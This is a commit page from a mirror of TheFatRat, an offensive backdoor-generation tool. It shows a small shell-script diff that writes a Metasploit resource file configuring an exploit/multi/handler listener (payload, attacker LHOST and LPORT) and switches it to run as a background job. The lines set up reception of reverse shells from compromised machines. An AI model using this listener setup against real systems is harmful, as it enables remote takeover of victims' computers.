0
0
Fork 0
mirror of https://github.com/Screetsec/TheFatRat.git synced 2023-12-14 02:02:58 +01:00

Update fatrat

This commit is contained in:
peterpt 2017-03-20 09:20:45 -04:00 committed by GitHub
parent 4cecc531bd
commit 114921d3d4

3
fatrat
View file

@ -1812,8 +1812,7 @@ echo "use exploit/multi/handler" > $svf
echo "set PAYLOAD $payload" >> $svf
echo "set LHOST $yourip" >> $svf
echo "set LPORT $yourport" >> $svf
echo "exploit" >> $svf
echo "exit -y" >> $svf
echo "exploit -j" >> $svf
echo -e $okegreen "Configuration file saved to $list/$save.rc"
fi
echo -e $okegreen ""